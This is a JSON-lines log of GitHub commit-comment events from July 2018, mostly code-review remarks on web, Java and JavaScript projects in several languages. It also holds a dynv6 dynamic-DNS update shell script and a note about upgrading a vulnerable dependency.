{"id":"7933559376","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"d-Johnny/friends"},"payload":{"comment":{"id":29632399,"position":36,"line":36,"path":"index.html","commit_id":"de89f875cd2ad5ee000e8105e32221ae47ddd20b","created_at":"2018-07-08T08:04:03Z","updated_at":"2018-07-08T08:04:03Z","author_association":"COLLABORATOR","body":"в конце файла желательно оставлять пустую строку, тогда на гитхабе не будет этого красного символа в конце 36 строки"}},"created_at":"2018-07-08T08:04:03Z"}
{"id":"7933561275","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_hardware_sprd"},"payload":{"comment":{"id":29632405,"position":null,"line":null,"path":null,"commit_id":"06120bd9403fb64b44ddcbbbf90c7497ea45abb3","created_at":"2018-07-08T08:05:42Z","updated_at":"2018-07-08T08:05:42Z","author_association":"OWNER","body":"const is just there to protect programming mistake."}},"created_at":"2018-07-08T08:05:42Z"}
{"id":"7933561949","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"d-Johnny/friends"},"payload":{"comment":{"id":29632408,"position":12,"line":12,"path":"pages.html","commit_id":"de89f875cd2ad5ee000e8105e32221ae47ddd20b","created_at":"2018-07-08T08:06:14Z","updated_at":"2018-07-08T08:06:14Z","author_association":"COLLABORATOR","body":"Если надо чтобы каждая картинка была с новой строки, можно каждый элемент завернуть в div:\r\n```\r\n<div>\r\n  <img src=\"acter/devid.png\" alt=\"devid\" >\r\n</div>\r\n```"}},"created_at":"2018-07-08T08:06:14Z"}
{"id":"7933562841","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"d-Johnny/friends"},"payload":{"comment":{"id":29632413,"position":4,"line":4,"path":"table.html","commit_id":"de89f875cd2ad5ee000e8105e32221ae47ddd20b","created_at":"2018-07-08T08:06:59Z","updated_at":"2018-07-08T08:06:59Z","author_association":"COLLABORATOR","body":"если элемент head пустой его можно и вовсе удалить. Ну а лучше хотябы в head добавить title - название страницы"}},"created_at":"2018-07-08T08:06:59Z"}
{"id":"7933563052","type":"CommitCommentEvent","actor":{"login":"Kamleshpaul"},"repo":{"name":"Kamleshpaul/Kamleshpaul.github.io"},"payload":{"comment":{"id":29632415,"position":null,"line":null,"path":null,"commit_id":"ef714db58f49b08acd5fc60b2e3c92947b56f416","created_at":"2018-07-08T08:07:12Z","updated_at":"2018-07-08T08:07:12Z","author_association":"OWNER","body":"h"}},"created_at":"2018-07-08T08:07:12Z"}
{"id":"7933563111","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29632416,"position":null,"line":null,"path":null,"commit_id":"8473880c4962019c978430d65808413163ce0d7a","created_at":"2018-07-08T08:07:16Z","updated_at":"2018-07-08T08:07:16Z","author_association":"MEMBER","body":"IMO, writing hundreds of `makie` plugins to support the hundreds of `make` commands and increasing the maintenance burden of then always having to create a `makie` plugin whenever a `make` command is added is a waste of time. Ditto for having to also propagate changes to `make` commands (e.g., renaming environment variables, etc).\r\n\r\nFurther, using `makie` is not ideal in general, as all terminal highlighting is lost, etc, due to having to pipe from the child process to the parent process. Error handling is also not particularly robust, once again, due to the child bridge. `makie` is more a band-aid, than something which should become some integral part of what we do and require substantial developer resources. Currently, it supports what I would consider the bare minimum of necessary commands for the main use cases where you want to filter based on the current directory, and no more. And I see no reason to change that."}},"created_at":"2018-07-08T08:07:16Z"}
{"id":"7933566498","type":"CommitCommentEvent","actor":{"login":"apichat1951notw"},"repo":{"name":"topthammasak/topthammasak"},"payload":{"comment":{"id":29632423,"position":null,"line":null,"path":null,"commit_id":"38a2fca92dbefc798f94bf5009c90ebdbbe317fd","created_at":"2018-07-08T08:10:26Z","updated_at":"2018-07-08T08:10:26Z","author_association":"COLLABORATOR","body":"Hello"}},"created_at":"2018-07-08T08:10:26Z"}
{"id":"7933566893","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29632424,"position":null,"line":null,"path":null,"commit_id":"8473880c4962019c978430d65808413163ce0d7a","created_at":"2018-07-08T08:10:47Z","updated_at":"2018-07-08T08:10:47Z","author_association":"MEMBER","body":"If we were able to automate it all, where any change to `make` could automatically be used in `makie`, then maybe. But that is an extremely big *if*, and, rather bluntly, I think we have a lot more important and pressing needs to attend to in the project. Achieving such automation is a rabbit hole and significant time sink."}},"created_at":"2018-07-08T08:10:47Z"}
{"id":"7933568974","type":"CommitCommentEvent","actor":{"login":"Planeshifter"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":29632432,"position":null,"line":null,"path":null,"commit_id":"8473880c4962019c978430d65808413163ce0d7a","created_at":"2018-07-08T08:12:33Z","updated_at":"2018-07-08T08:12:33Z","author_association":"MEMBER","body":"Okay, fair points. I will remove this plugin for now. However, we should change the makie README (currently stating \"This directory contains utilities and plugins for using makie, which allows executing project Makefile commands from anywhere in the project.\") to highlight that it is for directory-level commands and also add a `makie --help` printout of all available commands inside `makie`."}},"created_at":"2018-07-08T08:12:33Z"}
{"id":"7933572848","type":"CommitCommentEvent","actor":{"login":"ShaneHsu008"},"repo":{"name":"ShaneHsu008/MVC5Course"},"payload":{"comment":{"id":29632442,"position":20,"line":20,"path":"MVC5Course/Controllers/ARController.cs","commit_id":"ef2f04a2b49894a63aa078d7469261cb40d000d9","created_at":"2018-07-08T08:15:46Z","updated_at":"2018-07-08T08:15:46Z","author_association":"OWNER","body":"如果沒將型態轉成objaect，那麼就會變成是去找model這個變數所存的字串當作View的名稱。"}},"created_at":"2018-07-08T08:15:46Z"}
{"id":"7933573466","type":"CommitCommentEvent","actor":{"login":"Bosebcc"},"repo":{"name":"Bosebcc/Realsat"},"payload":{"comment":{"id":29632445,"position":null,"line":null,"path":null,"commit_id":"4205b63260526eac4031d987b501a9aac5d223b5","created_at":"2018-07-08T08:16:18Z","updated_at":"2018-07-08T08:16:18Z","author_association":"OWNER","body":"<img width=\"567\" alt=\"screen shot 2018-07-08 at 15 15 51\" src=\"https://user-images.githubusercontent.com/32533504/42418036-d7b8a500-82c1-11e8-8521-0f85d3f12004.png\">\r\n\r\n"}},"created_at":"2018-07-08T08:16:18Z"}
{"id":"7933574076","type":"CommitCommentEvent","actor":{"login":"kapillamba4"},"repo":{"name":"kapillamba4/github-webhook-demo"},"payload":{"comment":{"id":29632447,"position":null,"line":null,"path":null,"commit_id":"f62434ca2c4971bee0954f8c1cc0eed43dbe1883","created_at":"2018-07-08T08:16:47Z","updated_at":"2018-07-08T08:16:47Z","author_association":"OWNER","body":"comment 4"}},"created_at":"2018-07-08T08:16:47Z"}
{"id":"7933575076","type":"CommitCommentEvent","actor":{"login":"ruthgu"},"repo":{"name":"ruthgu/React-Course"},"payload":{"comment":{"id":29632452,"position":null,"line":null,"path":null,"commit_id":"d1b75904cddcfdb7b9810edc63c2b5fdf2523080","created_at":"2018-07-08T08:17:38Z","updated_at":"2018-07-08T08:17:38Z","author_association":"OWNER","body":"write text"}},"created_at":"2018-07-08T08:17:38Z"}
{"id":"7933575142","type":"CommitCommentEvent","actor":{"login":"faigyg"},"repo":{"name":"faigyg/react-course"},"payload":{"comment":{"id":29632456,"position":null,"line":null,"path":null,"commit_id":"6edc4efcf05b9d7f6adeef1b50b356baef2af3c5","created_at":"2018-07-08T08:17:41Z","updated_at":"2018-07-08T08:17:41Z","author_association":"OWNER","body":"second comments "}},"created_at":"2018-07-08T08:17:41Z"}
{"id":"7933578496","type":"CommitCommentEvent","actor":{"login":"SunriseFox"},"repo":{"name":"windring/Izumi"},"payload":{"comment":{"id":29632470,"position":null,"line":null,"path":null,"commit_id":"b137cd154d005f5a8cb568a25e003f958d444739","created_at":"2018-07-08T08:20:44Z","updated_at":"2018-07-08T08:20:44Z","author_association":"NONE","body":"## `五目小哥哥` 太 **强** 了"}},"created_at":"2018-07-08T08:20:44Z"}
{"id":"7933589054","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29632499,"position":null,"line":null,"path":null,"commit_id":"c6d06d8d0f59b201a6f7c792af17763a724a9816","created_at":"2018-07-08T08:29:42Z","updated_at":"2018-07-08T08:29:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-08T08:29:42Z"}
{"id":"7933589141","type":"CommitCommentEvent","actor":{"login":"tualatin"},"repo":{"name":"tualatin/tailforwindows"},"payload":{"comment":{"id":29632500,"position":null,"line":null,"path":null,"commit_id":"c401cd9cc00b29ed43975806c6c5655c2e6bdcbb","created_at":"2018-07-08T08:29:47Z","updated_at":"2018-07-08T08:29:47Z","author_association":"OWNER","body":"fix #5, fix #25"}},"created_at":"2018-07-08T08:29:47Z"}
{"id":"7933589362","type":"CommitCommentEvent","actor":{"login":"CleverChen"},"repo":{"name":"CleverChen/demo"},"payload":{"comment":{"id":29632501,"position":null,"line":null,"path":null,"commit_id":"a674d39fbb8be397fcd3c946dea0ba9b80e7194d","created_at":"2018-07-08T08:30:00Z","updated_at":"2018-07-08T08:30:00Z","author_association":"OWNER","body":"cool"}},"created_at":"2018-07-08T08:30:00Z"}
{"id":"7933592711","type":"CommitCommentEvent","actor":{"login":"dqzhangedu"},"repo":{"name":"dqzhangedu/jetbrainsswot"},"payload":{"comment":{"id":29632509,"position":null,"line":null,"path":null,"commit_id":"3949bb622111cdc721eeede467b066758fac62a3","created_at":"2018-07-08T08:32:40Z","updated_at":"2018-07-08T08:32:40Z","author_association":"OWNER","body":"URL:  www.ustl.edu.cn"}},"created_at":"2018-07-08T08:32:40Z"}
{"id":"7933592715","type":"CommitCommentEvent","actor":{"login":"Chen1406736605"},"repo":{"name":"CleverChen/demo"},"payload":{"comment":{"id":29632510,"position":null,"line":null,"path":null,"commit_id":"a674d39fbb8be397fcd3c946dea0ba9b80e7194d","created_at":"2018-07-08T08:32:40Z","updated_at":"2018-07-08T08:32:40Z","author_association":"COLLABORATOR","body":"what????"}},"created_at":"2018-07-08T08:32:40Z"}
{"id":"7933593700","type":"CommitCommentEvent","actor":{"login":"CleverChen"},"repo":{"name":"CleverChen/demo"},"payload":{"comment":{"id":29632512,"position":null,"line":null,"path":null,"commit_id":"a674d39fbb8be397fcd3c946dea0ba9b80e7194d","created_at":"2018-07-08T08:33:32Z","updated_at":"2018-07-08T08:33:32Z","author_association":"OWNER","body":"@Chen1406736605 ggg"}},"created_at":"2018-07-08T08:33:32Z"}
{"id":"7933598905","type":"CommitCommentEvent","actor":{"login":"Benau"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29632522,"position":null,"line":null,"path":null,"commit_id":"8a25edf2cce915f04319139aa7b898d3737c390c","created_at":"2018-07-08T08:37:55Z","updated_at":"2018-07-08T08:37:55Z","author_association":"MEMBER","body":"@deveee  can u restart your ranked server too? (with updated stk-assets)"}},"created_at":"2018-07-08T08:37:55Z"}
{"id":"7933599050","type":"CommitCommentEvent","actor":{"login":"opeadeyomoye"},"repo":{"name":"pyrocms/pyrocms"},"payload":{"comment":{"id":29632523,"position":null,"line":null,"path":null,"commit_id":"fc8cc1253503d9458c39359cb836f21821beb897","created_at":"2018-07-08T08:38:03Z","updated_at":"2018-07-08T08:38:03Z","author_association":"NONE","body":"I don't get it @RyanThompson. What is it you dig?"}},"created_at":"2018-07-08T08:38:03Z"}
{"id":"7933602686","type":"CommitCommentEvent","actor":{"login":"alsemyonov"},"repo":{"name":"dry-rb/dry-validation"},"payload":{"comment":{"id":29632528,"position":5,"line":9,"path":"lib/dry/validation/input_processor_compiler/sanitizer.rb","commit_id":"5ae8a8ef4e746fdcd81fbc61d0ae1bae88b067ad","created_at":"2018-07-08T08:41:19Z","updated_at":"2018-07-08T08:41:19Z","author_association":"NONE","body":"Should this line say `integer?: 'integer'`, and the one above say `string?: 'string'`?\r\nThat way both of them will conform to their type names."}},"created_at":"2018-07-08T08:41:19Z"}
{"id":"7933602775","type":"CommitCommentEvent","actor":{"login":"haskell-jp-bot"},"repo":{"name":"haskell-jp/blog"},"payload":{"comment":{"id":29632529,"position":null,"line":null,"path":null,"commit_id":"c9a3bea836e831e8031a7bb4871316a5fc3acdef","created_at":"2018-07-08T08:41:23Z","updated_at":"2018-07-08T08:41:23Z","author_association":"NONE","body":"https://circleci.com/gh/haskell-jp/blog/486/artifacts/0/root/project/generated-site/index.html"}},"created_at":"2018-07-08T08:41:23Z"}
{"id":"7933603327","type":"CommitCommentEvent","actor":{"login":"danhdo1012"},"repo":{"name":"danhdo1012/urban-doodle"},"payload":{"comment":{"id":29632532,"position":1,"line":1,"path":"README.md","commit_id":"414c9e6fba7ae51a41d3fb684e1220050c9071d7","created_at":"2018-07-08T08:41:55Z","updated_at":"2018-07-08T08:41:55Z","author_association":"OWNER","body":"\r\n#!/bin/sh -e\r\nhostname=$1\r\ndevice=$2\r\nfile=$HOME/.dynv6.addr6\r\n[ -e $file ] && old=`cat $file`\r\n\r\nif [ -z \"$hostname\" -o -z \"$token\" ]; then\r\n  echo \"Usage: token=<your-authentication-token> [netmask=64] $0 your-name.dynv6.net [device]\"\r\n  exit 1\r\nfi\r\n\r\nif [ -z \"$netmask\" ]; then\r\n  netmask=128\r\nfi\r\n\r\nif [ -n \"$device\" ]; then\r\n  device=\"dev $device\"\r\nfi\r\naddress=$(ip -6 addr list scope global $device | grep -v \" fd\" | sed -n 's/.*inet6 \\([0-9a-f:]\\+\\).*/\\1/p' | head -n 1)\r\n\r\nif [ -e /usr/bin/curl ]; then\r\n  bin=\"curl -fsS\"\r\nelif [ -e /usr/bin/wget ]; then\r\n  bin=\"wget -O-\"\r\nelse\r\n  echo \"neither curl nor wget found\"\r\n  exit 1\r\nfi\r\n\r\nif [ -z \"$address\" ]; then\r\n  echo \"no IPv6 address found\"\r\n  exit 1\r\nfi\r\n\r\n# address with netmask\r\ncurrent=$address/$netmask\r\n\r\nif [ \"$old\" = \"$current\" ]; then\r\n  echo \"IPv6 address unchanged\"\r\n  exit\r\nfi\r\n\r\n# send addresses to dynv6\r\n$bin \"http://dynv6.com/api/update?hostname=$hostname&ipv6=$current&token=$token\"\r\n$bin \"http://ipv4.dynv6.com/api/update?hostname=$hostname&ipv4=auto&token=$token\"\r\n\r\n# save current address\r\necho $current > $file"}},"created_at":"2018-07-08T08:41:55Z"}
{"id":"7933603393","type":"CommitCommentEvent","actor":{"login":"rokups"},"repo":{"name":"rokups/Urho3D"},"payload":{"comment":{"id":29632533,"position":9,"line":167,"path":"Source/Urho3D/CSharp/Script/InstanceCache.cs","commit_id":"ab1b74474ab9647fcd930fee9dd01d8c3ff82452","created_at":"2018-07-08T08:41:59Z","updated_at":"2018-07-08T08:41:59Z","author_association":"OWNER","body":"Benefit of mono is that you can use C API to insert data directly into managed array while in other runtimes there is extra copy involved."}},"created_at":"2018-07-08T08:41:59Z"}
{"id":"7933605224","type":"CommitCommentEvent","actor":{"login":"rgburke"},"repo":{"name":"rgburke/grv"},"payload":{"comment":{"id":29632538,"position":null,"line":null,"path":null,"commit_id":"5fd0cc8aa008496281f7f44854b9b7b9705f6ae6","created_at":"2018-07-08T08:43:34Z","updated_at":"2018-07-08T08:43:34Z","author_association":"OWNER","body":"I'm glad you noticed the improvement. I'll be looking at getting grv to display as much data as quickly as possible on start up. If it works out then working with large repositories should be nicer."}},"created_at":"2018-07-08T08:43:34Z"}
{"id":"7933605706","type":"CommitCommentEvent","actor":{"login":"Gokullan"},"repo":{"name":"Gokullan/fff"},"payload":{"comment":{"id":29632539,"position":3,"line":3,"path":"README.md","commit_id":"78b7d568a5ed7a1470604acbd890efd810506b79","created_at":"2018-07-08T08:44:01Z","updated_at":"2018-07-08T08:44:01Z","author_association":"OWNER","body":"l,\r\n"}},"created_at":"2018-07-08T08:44:01Z"}
{"id":"7933606004","type":"CommitCommentEvent","actor":{"login":"sdelamo"},"repo":{"name":"micronaut-projects/micronaut-core"},"payload":{"comment":{"id":29632541,"position":46,"line":128,"path":"security/src/test/groovy/io/micronaut/security/HealthSensitivitySpec.groovy","commit_id":"358a0099d116801cd3b16fedb190194fe3a6ad1a","created_at":"2018-07-08T08:44:16Z","updated_at":"2018-07-08T08:44:16Z","author_association":"COLLABORATOR","body":"Yes, I saw you uncommented them in` 283fc5ed Restore tests`. Thanks"}},"created_at":"2018-07-08T08:44:16Z"}
{"id":"7933610500","type":"CommitCommentEvent","actor":{"login":"lalita123"},"repo":{"name":"lalita123/RAJ-KUMAR"},"payload":{"comment":{"id":29632553,"position":null,"line":null,"path":null,"commit_id":"ad7320092bc61544cddb3ef9bc955fe30865dd3d","created_at":"2018-07-08T08:48:10Z","updated_at":"2018-07-08T08:48:10Z","author_association":"OWNER","body":"THANKS"}},"created_at":"2018-07-08T08:48:10Z"}
{"id":"7933615449","type":"CommitCommentEvent","actor":{"login":"g5321247"},"repo":{"name":"g5321247/recipes"},"payload":{"comment":{"id":29632560,"position":13,"line":16,"path":"chili-recipe.txt","commit_id":"52db2de7d6c2cfbb5b8d270716024b600c636d33","created_at":"2018-07-08T08:52:27Z","updated_at":"2018-07-08T08:52:27Z","author_association":"OWNER","body":"too much oil"}},"created_at":"2018-07-08T08:52:27Z"}
{"id":"7933616955","type":"CommitCommentEvent","actor":{"login":"oehme"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":29632564,"position":20,"line":60,"path":"subprojects/tooling-api/src/main/java/org/gradle/tooling/model/gradle/GradleBuild.java","commit_id":"5e806925273e50b92bab07714cd551f21a891e93","created_at":"2018-07-08T08:53:40Z","updated_at":"2018-07-08T08:53:40Z","author_association":"MEMBER","body":"I don't understand this distinction. #getIncludedBuilds was meant to only return builds that are owned by this build. If it returns anything else (external source deps) that would be a bug in my opinion. I think the only difference between these two methods should be that one returns all builds in the hierarchy while the other one only returns the direct children."}},"created_at":"2018-07-08T08:53:40Z"}
{"id":"7933617306","type":"CommitCommentEvent","actor":{"login":"OrionDevelopment"},"repo":{"name":"ldtteam/BlockOut"},"payload":{"comment":{"id":29632565,"position":81,"line":81,"path":"src/main/java/com/minecolonies/blockout/element/simple/ItemIcon.java","commit_id":"73c7f5ac33c5179483eb469112b7b57da2d20a7f","created_at":"2018-07-08T08:53:59Z","updated_at":"2018-07-08T08:53:59Z","author_association":"CONTRIBUTOR","body":"Check your rendering controller. It has methods to render stacks....."}},"created_at":"2018-07-08T08:53:59Z"}
{"id":"7933617942","type":"CommitCommentEvent","actor":{"login":"kep-w"},"repo":{"name":"kep-w/microblog"},"payload":{"comment":{"id":29632568,"position":null,"line":null,"path":null,"commit_id":"19202b9271d00fd039338ac21427cb44f65a66f2","created_at":"2018-07-08T08:54:27Z","updated_at":"2018-07-08T08:54:27Z","author_association":"OWNER","body":"try"}},"created_at":"2018-07-08T08:54:27Z"}
{"id":"7933618807","type":"CommitCommentEvent","actor":{"login":"kargarisaac"},"repo":{"name":"kargarisaac/pointnet"},"payload":{"comment":{"id":29632570,"position":null,"line":null,"path":null,"commit_id":"d1fa2347e00be774e34be5ea6dc74638959894f1","created_at":"2018-07-08T08:55:09Z","updated_at":"2018-07-08T08:55:09Z","author_association":"OWNER","body":"Sry I made mistake. I didn't mean to change your readme. I used pointnet for 3d-mnist classification. I want to use it for semantic segmentation too. But, I don't know how to pre-process data. Would you please help me?"}},"created_at":"2018-07-08T08:55:09Z"}
{"id":"7933619603","type":"CommitCommentEvent","actor":{"login":"joshkolasch"},"repo":{"name":"joshkolasch/angular-tour-of-heroes"},"payload":{"comment":{"id":29632572,"position":null,"line":null,"path":null,"commit_id":"29235010c28b15093933ea806c220a81e13f8585","created_at":"2018-07-08T08:55:50Z","updated_at":"2018-07-08T08:55:50Z","author_association":"OWNER","body":"Updated hoek dependency with vulnerability to 5.0.3 using 'npm intall hoek@5'. Reference to resolution in forum: \"https://github.com/hapijs/hoek/issues/247\". Helpful comment from WesTyler on May15, 2018."}},"created_at":"2018-07-08T08:55:50Z"}
{"id":"7933622717","type":"CommitCommentEvent","actor":{"login":"batpigandme"},"repo":{"name":"tidyverse/tidyverse.org"},"payload":{"comment":{"id":29632577,"position":97,"line":64,"path":"content/articles/2018-07-talk-carpe-diem.markdown","commit_id":"d54a73b7276ac43cce85c25550e0290c1a13cb07","created_at":"2018-07-08T08:58:32Z","updated_at":"2018-07-08T08:58:32Z","author_association":"MEMBER","body":"I'd use gerunds for the list (Giving, Purchasing, Making), but both ways are valid. "}},"created_at":"2018-07-08T08:58:32Z"}
{"id":"7933624394","type":"CommitCommentEvent","actor":{"login":"batpigandme"},"repo":{"name":"tidyverse/tidyverse.org"},"payload":{"comment":{"id":29632578,"position":102,"line":68,"path":"content/articles/2018-07-talk-carpe-diem.markdown","commit_id":"d54a73b7276ac43cce85c25550e0290c1a13cb07","created_at":"2018-07-08T08:59:57Z","updated_at":"2018-07-08T08:59:57Z","author_association":"MEMBER","body":"No comma between \"it\" and \"with fat fingers\""}},"created_at":"2018-07-08T08:59:57Z"}
{"id":"7933624509","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29632580,"position":1,"line":1,"path":".idea/vcs.xml","commit_id":"8b84684002212c636974b4be9819ac4c20363e4b","created_at":"2018-07-08T09:00:02Z","updated_at":"2018-07-08T09:00:02Z","author_association":"NONE","body":"ВОт этот попал."}},"created_at":"2018-07-08T09:00:02Z"}
{"id":"7933625496","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29632589,"position":1,"line":1,"path":".gitignore","commit_id":"8b84684002212c636974b4be9819ac4c20363e4b","created_at":"2018-07-08T09:00:34Z","updated_at":"2018-07-08T09:00:34Z","author_association":"NONE","body":"`.idea/` - иначе он думает, что .idea - файл."}},"created_at":"2018-07-08T09:00:34Z"}
{"id":"7933627034","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29632591,"position":25,"line":25,"path":"quiz/build.gradle","commit_id":"8b84684002212c636974b4be9819ac4c20363e4b","created_at":"2018-07-08T09:01:40Z","updated_at":"2018-07-08T09:01:40Z","author_association":"NONE","body":"Закомментированный код не оставляем в файлах. Для этого и есть git"}},"created_at":"2018-07-08T09:01:40Z"}
{"id":"7933627241","type":"CommitCommentEvent","actor":{"login":"batpigandme"},"repo":{"name":"tidyverse/tidyverse.org"},"payload":{"comment":{"id":29632592,"position":108,"line":72,"path":"content/articles/2018-07-talk-carpe-diem.markdown","commit_id":"d54a73b7276ac43cce85c25550e0290c1a13cb07","created_at":"2018-07-08T09:01:50Z","updated_at":"2018-07-08T09:01:50Z","author_association":"MEMBER","body":"let's → lets "}},"created_at":"2018-07-08T09:01:50Z"}
{"id":"7933627553","type":"CommitCommentEvent","actor":{"login":"akramtexas"},"repo":{"name":"akramtexas/edgex-go"},"payload":{"comment":{"id":29632593,"position":null,"line":null,"path":null,"commit_id":"ee5c8aca85efc3b89185aa818f791898080209ad","created_at":"2018-07-08T09:02:07Z","updated_at":"2018-07-08T09:02:07Z","author_association":"OWNER","body":"I want to point out an inaccuracy (in the comment above which accompanies this commit) that I caught after the fact: I had meant to say, **HTTP 202** status code (http.StatusAccepted) and _not_ HTTP 201."}},"created_at":"2018-07-08T09:02:07Z"}
{"id":"7933627851","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"yanovsiannikov/Lesson6facultative"},"payload":{"comment":{"id":29632594,"position":14,"line":14,"path":"css/style.css","commit_id":"ccbc90be539f6ad026dbbeb932ae7b4683a0ade1","created_at":"2018-07-08T09:02:21Z","updated_at":"2018-07-08T09:02:21Z","author_association":"COLLABORATOR","body":"на самом деле если мы делаем для новых браузеров то мы можем все лишнее удалить и оставить только:\r\n```\r\n@keyframes blink1 {\r\n  0% { color: rgba(255, 0, 0, 1); }\r\n  50% { color: rgba(255, 0, 0, 0.4); }\r\n  100% { color: rgba(255, 0, 0, 1); }\r\n}\r\n\r\n.top {\r\n  display: inline-block;\r\n  vertical-align: top;\r\n  width: 50px;\r\n  height: 50px;\r\n  background: linear-gradient(to bottom, rgba(197, 196, 196, 1) 0%, rgba(180, 179, 178, 1) 100%);\r\n  position: relative;\r\n  animation-name: rotation;\r\n  animation-duration: 10s;\r\n  animation-iteration-count: infinite;\r\n  animation-timing-function: linear;\r\n}\r\n\r\n@keyframes rotation {\r\n  0% {\r\n    transform:rotate(0deg);\r\n  }\r\n  100% {\r\n    transform:rotate(360deg);\r\n  }\r\n}\r\n\r\n\r\n```"}},"created_at":"2018-07-08T09:02:21Z"}
{"id":"7933629880","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29632602,"position":7,"line":7,"path":"quiz/src/main/java/ru/serdar1980/domain/Question.java","commit_id":"8b84684002212c636974b4be9819ac4c20363e4b","created_at":"2018-07-08T09:04:03Z","updated_at":"2018-07-08T09:04:03Z","author_association":"NONE","body":"Ага, а это final тогда уж)"}},"created_at":"2018-07-08T09:04:03Z"}
{"id":"7933631103","type":"CommitCommentEvent","actor":{"login":"batpigandme"},"repo":{"name":"tidyverse/tidyverse.org"},"payload":{"comment":{"id":29632604,"position":null,"line":null,"path":null,"commit_id":"d54a73b7276ac43cce85c25550e0290c1a13cb07","created_at":"2018-07-08T09:05:04Z","updated_at":"2018-07-08T09:05:04Z","author_association":"MEMBER","body":"Awesome!"}},"created_at":"2018-07-08T09:05:04Z"}
{"id":"7933631739","type":"CommitCommentEvent","actor":{"login":"klishevich"},"repo":{"name":"yanovsiannikov/Lesson6facultative"},"payload":{"comment":{"id":29632606,"position":115,"line":115,"path":"css/style.css","commit_id":"ccbc90be539f6ad026dbbeb932ae7b4683a0ade1","created_at":"2018-07-08T09:05:38Z","updated_at":"2018-07-08T09:05:38Z","author_association":"COLLABORATOR","body":"тут я бы наверное добавил общий класс layer, в который бы вынес общие вещи, такие как:\r\n```\r\n.layer {\r\n  margin-left: auto;\r\n  margin-right: auto;\r\n  width: 0;\r\n  height: 0;\r\n}\r\n```\r\n\r\nи в html использовал два класса:\r\n```html\r\n<div class=\"layer layer-1\"></div>\r\n```"}},"created_at":"2018-07-08T09:05:38Z"}
{"id":"7933631794","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"serdar1980/spring"},"payload":{"comment":{"id":29632607,"position":31,"line":31,"path":"quiz/src/main/java/ru/serdar1980/service/MessageLocateService.java","commit_id":"8b84684002212c636974b4be9819ac4c20363e4b","created_at":"2018-07-08T09:05:41Z","updated_at":"2018-07-08T09:05:41Z","author_association":"NONE","body":"А я понял - нужно просто static убрать и будет всё отлично))) на будущее - статиков в бинах по хорошему не должно быть."}},"created_at":"2018-07-08T09:05:41Z"}
{"id":"7933635952","type":"CommitCommentEvent","actor":{"login":"davidbulka"},"repo":{"name":"startach/dMelechClient"},"payload":{"comment":{"id":29632614,"position":null,"line":null,"path":null,"commit_id":"aea4b2314ca64bf95c962982d9222981f30c6b18","created_at":"2018-07-08T09:09:06Z","updated_at":"2018-07-08T09:09:06Z","author_association":"MEMBER","body":"מצויין👍 בבקשה רק תימנע מלשים אינסטנס של מפה על MapManager, בדיוק בשביל זה יש קומפוננטה של מפה שמחזיקה את האינסטנס. אתה יכול להוסיף input לקומפוננטה של המפה ולהקשיב לשינויים שם, ושם לקרוא לפונקציה של הMapManager. !תכולה ממש מגניבה"}},"created_at":"2018-07-08T09:09:06Z"}
{"id":"7933636071","type":"CommitCommentEvent","actor":{"login":"nbolton"},"repo":{"name":"symless/synergy-core"},"payload":{"comment":{"id":29632615,"position":null,"line":null,"path":null,"commit_id":"135195c426d0dedccd1949dbc0dcbd10a008b795","created_at":"2018-07-08T09:09:12Z","updated_at":"2018-07-08T09:09:12Z","author_association":"MEMBER","body":"https://github.com/symless/synergy-core/issues/6347"}},"created_at":"2018-07-08T09:09:12Z"}
{"id":"7933637078","type":"CommitCommentEvent","actor":{"login":"nbolton"},"repo":{"name":"symless/synergy-core"},"payload":{"comment":{"id":29632617,"position":null,"line":null,"path":null,"commit_id":"3a5e194b1216240cbbe2cb06a799699a04e97527","created_at":"2018-07-08T09:10:08Z","updated_at":"2018-07-08T09:10:08Z","author_association":"MEMBER","body":"https://github.com/symless/synergy-core/issues/6345"}},"created_at":"2018-07-08T09:10:08Z"}
{"id":"7933637900","type":"CommitCommentEvent","actor":{"login":"nbolton"},"repo":{"name":"symless/synergy-core"},"payload":{"comment":{"id":29632620,"position":null,"line":null,"path":null,"commit_id":"bbc0ee577a92f1a704544ddb5b04d50ea357bba8","created_at":"2018-07-08T09:10:49Z","updated_at":"2018-07-08T09:10:49Z","author_association":"MEMBER","body":"https://github.com/symless/synergy-core/issues/6346"}},"created_at":"2018-07-08T09:10:49Z"}
